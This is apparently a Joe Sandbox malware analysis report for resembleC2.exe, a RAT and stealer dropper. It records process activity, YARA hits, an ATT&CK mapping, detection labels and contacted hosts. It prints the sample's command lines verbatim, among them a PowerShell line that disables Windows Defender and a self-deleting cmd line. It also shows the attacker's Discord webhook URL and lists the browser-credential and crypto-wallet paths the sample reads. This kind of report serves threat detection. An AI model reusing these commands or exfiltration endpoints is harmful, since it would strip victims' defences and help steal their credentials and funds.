                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\AppData\Local\Temp\MoonHub.exe" && pause
                            Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\PING.EXE ping localhost
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2
                            Source: C:\Users\user\Desktop\resembleC2.exe; Queries volume information: C:\Users\user\Desktop\resembleC2.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe VolumeInformation
                            Source: C:\Windows\System32\OpenWith.exe; Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                            Source: C:\Windows\System32\OpenWith.exe; Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                            Source: C:\Windows\System32\OpenWith.exe; Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\MoonHub.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Users\user\Desktop\resembleC2.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                            Lowering of HIPS / PFW / Operating System Security Settings

                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe; File written: C:\Windows\System32\drivers\etc\hosts
                            Source: 6z2guuz0ldkdgc1o.exe, 00000002.00000002.3343656728.0000000001651000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

                            Source: Yara match; File source: 0.2.resembleC2.exe.13020e48.1.unpack, type: UNPACKEDPE
                            Source: Yara match; File source: 5.0.MoonHub.exe.156585b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match; File source: 0.2.resembleC2.exe.13020e48.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match; File source: 00000005.00000002.2902392061.000001565AA5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match; File source: 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match; File source: 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara match; File source: 00000005.00000002.2902392061.000001565AAF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match; File source: Process Memory Space: resembleC2.exe PID: 1124, type: MEMORYSTR
                            Source: Yara match; File source: Process Memory Space: MoonHub.exe PID: 1784, type: MEMORYSTR
                            Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, type: DROPPED
                            Source: Yara match; File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr, type: DROPPED
                            Source: Yara match; File source: 0.2.resembleC2.exe.13020e48.1.unpack, type: UNPACKEDPE
                            Source: Yara match; File source: 5.0.MoonHub.exe.156585b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match; File source: 0.2.resembleC2.exe.13020e48.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match; File source: 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match; File source: 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara match; File source: 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match; File source: Process Memory Space: resembleC2.exe PID: 1124, type: MEMORYSTR
                            Source: Yara match; File source: Process Memory Space: MoonHub.exe PID: 1784, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr, type: DROPPED
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Electrum
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: BytecoinJaxx!com.liberty.jaxx
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AA2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AA2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 1C:\Users\user\AppData\Roaming\Ethereum\keystore
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Exodus
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Ethereum
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AA2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 5C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: keystore
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                            Remote Access Functionality

                            Source: Yara match | File source: 0.2.resembleC2.exe.13020e48.1.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 5.0.MoonHub.exe.156585b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0.2.resembleC2.exe.13020e48.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000005.00000002.2902392061.000001565AA5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000002.2902392061.000001565AAF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: resembleC2.exe PID: 1124, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: MoonHub.exe PID: 1784, type: MEMORYSTR
                            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, type: DROPPED
                            Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr, type: DROPPED

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 231 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 File and Directory Permissions Modification | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 11 Command and Scripting Interpreter | 12 Registry Run Keys / Startup Folder | 11 Process Injection | 21 Disable or Modify Tools | LSASS Memory | 223 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | 12 Registry Run Keys / Startup Folder | 2 Obfuscated Files or Information | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Software Packing | NTDS | 541 Security Software Discovery | Distributed Component Object Model | Input Capture | 4 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 15 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 351 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 351 Virtualization/Sandbox Evasion | Proc Filesystem | 11 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | 11 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

[Behavior graph: Behavior Graph ID: 1589390, Sample: resembleC2.exe, Startdate: 12/01/2025, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| resembleC2.exe | 58% | ReversingLabs | ByteCode-MSIL.Trojan.XWormRAT | |
| resembleC2.exe | 58% | Virustotal | | Browse |
| resembleC2.exe | 100% | Avira | TR/Dropper.Gen | |
| resembleC2.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| C:\Users\user\AppData\Local\Temp\MoonHub.exe | 100% | Avira | HEUR/AGEN.1307507 | |
| C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr | 100% | Avira | HEUR/AGEN.1307507 | |
| C:\Users\user\AppData\Local\Temp\MoonHub.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe | 100% | Joe Sandbox ML | | |
| C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr | 100% | Joe Sandbox ML | | |
| C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr | 76% | ReversingLabs | ByteCode-MSIL.Trojan.UmbralStealer | |
| C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe | 34% | ReversingLabs | ByteCode-MSIL.Backdoor.Crysan | |
| C:\Users\user\AppData\Local\Temp\MoonHub.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.UmbralStealer | |
| C:\Users\user\AppData\Local\Temp\resemble.py | 0% | ReversingLabs | | |

No Antivirus matches

No Antivirus matches

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| https://drive.0b | 0% | Avira URL Cloud | safe | |
| http://pesterbdd.com/images/Pester.pngP | 0% | Avira URL Cloud | safe | |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- | --- |
| discord.com | 162.159.135.232 | true | false | | high |
| ip-api.com | 208.95.112.1 | true | false | | high |
| 0.tcp.eu.ngrok.io | 18.153.198.123 | true | false | | unknown |
| coprophile.bounceme.net | unknown | unknown | false | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- |
| https://discord.com/api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQpohmaCuB-PwAuIP1xAUKw | false | | high |
| http://ip-api.com/line/?fields=hosting | false | | high |

| Name | Source | Malicious | Antivirus Detection | Reputation |
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000B.00000002.2278669843.0000017A00229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001C.00000002.2652291240.0000019936523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2650762653.0000019934BD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://contoso.com/Iconpowershell.exe, 0000001C.00000002.2823703286.0000019944D5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://drive.google.com/JMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 0000001C.00000002.2652291240.0000019936523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2650762653.0000019934BD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://github.com/Blank-c/Umbral-StealergqnbO.scr.5.drfalse
                                                                                                                              high
                                                                                                                              http://pesterbdd.com/images/Pester.pngPpowershell.exe, 00000011.00000002.2364720632.000001E15EB30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://drive.0bMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaultMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://docs.google.com/presentation/installwebapp?usp=chrMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://github.com/Blank-c/Umbral-StealerhTMoonHub.exe, 00000005.00000002.2902392061.000001565AAF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000B.00000002.2278669843.0000017A00229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://discord.com/api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQMoonHub.exe, 00000005.00000002.2902392061.000001565AAF4000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565AB1B000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565A3D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://docs.google.com/presentation/?usp=installed_webappMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://docs.google.com/presentation/installwebapp?usp=chro0bMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://aka.ms/pscore68powershell.exe, 0000000B.00000002.2278669843.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2319166030.000001E80005C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2319166030.000001E800049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2364720632.000001E15D2C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019934CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://ip-api.com/json/?fields=225545PMoonHub.exe, 00000005.00000002.2902392061.000001565AA5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://docs.google.com/document/?usp=installed_webappMoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://oneget.orgpowershell.exe, 00000011.00000002.2364720632.000001E15E925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD81794000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://ip-api.com/json/?fields=225545resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565AA5C000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, MoonHub.exe.0.dr, gqnbO.scr.5.drfalse
                                                                                                                                                      high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
3.78.28.71 | unknown | United States | 16509 | AMAZON-02US | false
18.153.198.123 | 0.tcp.eu.ngrok.io | United States | 16509 | AMAZON-02US | false
162.159.135.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1589390
Start date and time: 2025-01-12 07:09:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 45s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 35
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: resembleC2.exe
Detection: MAL
Classification: mal100.troj.adwa.spyw.evad.winEXE@45/27@7/4
EGA Information:
• Successful, ratio: 25%
HCA Information:
• Successful, ratio: 69%
• Number of executed functions: 279
• Number of non-executed functions: 15
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 216.58.206.35, 13.107.246.45, 184.28.90.27, 52.149.20.212, 4.175.87.197
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 1492 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 2220 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 4696 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5960 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6700 because it is empty
• Execution Graph export aborted for target resembleC2.exe, PID 1124 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:10:18 | API Interceptor | 1x Sleep call for process: OpenWith.exe modified
01:10:23 | API Interceptor | 5x Sleep call for process: WMIC.exe modified
01:10:26 | API Interceptor | 56048x Sleep call for process: MoonHub.exe modified
01:10:26 | API Interceptor | 33x Sleep call for process: powershell.exe modified
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      208.95.112.1F0DgoRk0p1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                      fpY3HP2cnH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                      4287eV6mBc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                      aik1mr9TOq.exeGet hashmaliciousPredatorBrowse
                                                                                                                                                      • ip-api.com/json/
                                                                                                                                                      DUWPFaZd3a.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                      tb4B9ni6vl.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                      juE8dtqPkx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                      YY3k9rjxpY.exeGet hashmaliciousAgentTeslaBrowse
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                              http://m.escritoresunidos.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 162.159.135.232
                                                                                                                                                                              https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 162.159.135.232
                                                                                                                                                                              https://telegrams-mh.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 162.159.135.232
                                                                                                                                                                              http://www.fmilocation.help/fmicode/code.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 162.159.135.232
                                                                                                                                                                              No context
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):236544
                                                                                                                                                                              Entropy (8bit):6.082686262892605
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:xloZM+rIkd8g+EtXHkv/iD4+Ocip3cw/oeHp0AVO0b8e1mMi:DoZtL+EP8+Ocip3cw/oeHp0AVji
                                                                                                                                                                              MD5:F70B5E56A09AF292D4E909C547F9C8C0
                                                                                                                                                                              SHA1:577883BDBE8DC9582E15E7A1212B1FE432BAFCE3
                                                                                                                                                                              SHA-256:8FD22C5ACB3144DBAA5AB3F9DD5901EB6F3BEEF67E72EA431246C6A790C067DE
